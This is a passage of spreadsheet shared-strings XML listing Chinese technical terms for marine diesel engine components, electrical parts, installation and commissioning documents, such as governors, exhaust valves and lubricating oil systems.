      <t>指示钮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>继电器插座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机旁控制箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导轨</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热继电器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>断路器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电流接触器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>时间继电器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋转开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图例板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标识</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全标识</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下垂式控制中心</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器润滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管，加热</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器冷却水管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单增压器的海水冷却管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架跟机座对接定位</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却管安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴臂距差质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <t>MC-S</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形螺栓安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警系统要求</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸油管电加热</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电伴热</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加热电缆布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机控制系统</t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离线式</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PMI</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带证书的多芯电缆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机仪表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机操纵系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加速程序</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>降速要求</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整文本</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机油漆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机大型备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器信息</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地质勘探</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气体质量要求</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油及燃油推荐</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主滑油及凸轮轴油</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油规格</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统，顶置油柜</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆填料函泄放油</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧树脂浇注记录表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧树脂记录表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座测量表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>台架试车及现场调试</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>现场调试</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函清洗说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调试报告</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套及冷却水套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓保护帽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铬镍铁合金涂层</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀安装螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空心杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性钢管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀附件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵滚轮导套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆形挡环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵滚轮导筒壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀滚轮导筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀滚轮导筒壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸起动阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气部件安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表接线</t>
    </r>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型型材</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器接线</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通道</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管夹弹性螺帽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆槽支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管隔热</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配文件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器驱动装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指针式调速器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器升压器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硅橡胶胶水</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器冷却器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>粘贴标识</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压站</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制</t>
    </r>
  </si>
  <si>
    <r>
      <t>Alpha</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器控制单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气箱底板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主控单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压铆紧固件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铝板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用模块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试软件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包装规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包装箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺帽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸压力测量设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴角度编码器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角度编码器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>编码器安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阻尼板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包装板材</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防坠落设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全带</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挂有环壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环下部壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空间布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机空间要求</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
